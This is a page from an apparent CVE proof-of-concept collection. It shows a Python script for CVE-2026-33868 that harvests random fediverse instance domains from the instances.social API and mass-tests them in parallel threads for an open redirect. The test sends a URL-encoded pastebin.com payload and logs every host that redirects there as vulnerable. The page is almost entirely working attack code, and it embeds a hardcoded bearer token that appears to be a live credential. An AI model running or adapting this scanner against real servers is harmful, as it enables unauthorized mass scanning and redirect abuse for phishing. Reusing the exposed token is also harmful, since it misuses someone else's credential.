5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-33868
README.md
Rendering markdown...
POC / CVE-2026-33868.py PY
⬇ Raw GitHub ✕ Close 
import sys
import requests
import os
import time
from concurrent.futures import ThreadPoolExecutor
from threading import Lock

GREEN = "\033[92m"
GRAY = "\033[90m"
RED = "\033[91m"
RESET = "\033[0m"

PAYLOAD = "%2Fpastebin.com%2f%72%61%77%2f%4d%70%67%56%67%30%43%51"
write_lock = Lock()

def load_banner():
    banner_file = "banner.txt"
    try:
        if os.path.exists(banner_file):
            with open(banner_file, "r", encoding="utf-8", errors="ignore") as f:
                print(f.read())
        else:
            print(f"{GRAY}[!] banner.txt tidak ditemukan{RESET}")
    except Exception as e:
        print(f"{RED}[!] Error load banner: {e}{RESET}")

def is_already_saved(url, filename):
    if not os.path.exists(filename):
        return False
    with open(filename, "r") as f:
        return any(url.strip() == line.strip() for line in f)

def check_vuln(domain, output_file):
    target_url = f"https://{domain}/web/{PAYLOAD}"
    try:
        res = requests.get(target_url, timeout=10, allow_redirects=False, verify=True)
        location = res.headers.get("Location", "")
        
        if res.status_code in [301, 302] and "pastebin.com" in location:
            with write_lock:
                if not is_already_saved(target_url, output_file):
                    with open(output_file, "a") as f:
                        f.write(target_url + "\n")
                    print(f"{GREEN}[VULN] {target_url}{RESET}")
                else:
                    print(f"{GRAY}[DUP]  {domain} (Already in file){RESET}")
        else:
            print(f"{GRAY}[SAFE] {domain}{RESET}")
            
    except Exception:
        pass

def start_mining(fetch_count, threads, output_file):
    api_url = "https://instances.social/api/1.0/instances/sample"
    headers = {
        "Authorization": "Bearer icMDE9ZhQLHCV8evP7S4VdQkMlgoe468MRINBHLPTTAdJVHGrVT1EVAo7GK7elR7RyQkfMGG8SEVlwyFSshIx75PjcXNPg26XxQincPXGQam1AL9zgLUqeT6LjQVUUoV"
    }

    print(f"[*] Mining Started - Threads: {threads} - Mode: Accurate Anti-Duplicate")
    
    while True:
        try:
            response = requests.get(api_url, headers=headers, params={"count": fetch_count}, timeout=15)
            if response.status_code == 401:
                print(f"{RED}[!] Token Error / Expired{RESET}")
                break
                
            data = response.json().get("instances", [])
            domains = [i['name'] for i in data]

            with ThreadPoolExecutor(max_workers=int(threads)) as executor:
                for dom in domains:
                    executor.submit(check_vuln, dom, output_file)
            
            time.sleep(1)

        except KeyboardInterrupt:
            print(f"\n{RED}[!] Stopping...{RESET}")
            sys.exit()
        except Exception as e:
            print(f"{RED}[!] Error: {e}{RESET}")
            time.sleep(5)

if __name__ == "__main__":
    load_banner()

    if len(sys.argv) < 5:
        print(f"{RED}Usage: python3 1.py <fetch_count> <threads> -o <output.txt>{RESET}")
        sys.exit()

    f_count = sys.argv[1]
    t_count = sys.argv[2]
    out_f = sys.argv[4]

    start_mining(f_count, t_count, out_f)